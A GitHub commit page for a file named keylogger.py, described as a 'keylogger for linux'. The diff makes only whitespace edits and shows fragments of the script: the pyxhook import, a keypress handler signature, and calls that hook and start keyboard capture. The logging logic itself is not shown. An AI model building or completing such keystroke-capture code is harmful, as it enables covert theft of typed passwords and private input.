Skip to content

Commit bd05448

Browse files
author
mohamed larit
authored
keylogger for linux
1 parent d225b8c commit bd05448

File tree

1 file changed

+1
-3
lines changed

1 file changed

+1
-3
lines changed

keylogger.py

Lines changed: 1 addition & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,6 @@
22

33
import pyxhook
44

5-
65
"""
76
*--------------------------------------*
87
| programmed by : mohamed |
@@ -16,7 +15,6 @@
1615
1716
Keylogger
1817
-----------
19-
2018
"""
2119

2220

@@ -40,4 +38,4 @@ def keypress(event):
4038

4139
key.HookKeyboard()
4240

43-
key.start()
41+
key.start()

0 commit comments

Comments
 (0)